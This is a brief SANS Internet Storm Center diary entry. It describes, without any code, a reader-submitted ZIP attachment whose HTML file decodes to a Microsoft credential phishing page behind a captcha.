Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: Reader Malware: ZIP/HTML Phish SANS ISC InfoSec Forums

Participate: Learn more about our honeypot network
https://isc.sans.edu/honeypot.html

Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Reader Malware: ZIP/HTML Phish

Reader Henry submitted a malicious email attachment: a ZIP file.

It contains a PNG file and a HTML file:

The HTML file contains a script with hexadecimal code, that can be decoded with base64dump.py:

This is a phishing site for Microsoft credentials, that starts with a captcha:

There's something more to this zip file: that's for next diary entry.

Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com

DidierStevens

597 Posts
ISC Handler
Oct 23rd 2021

Sign Up for Free or Log In to start participating in the conversation!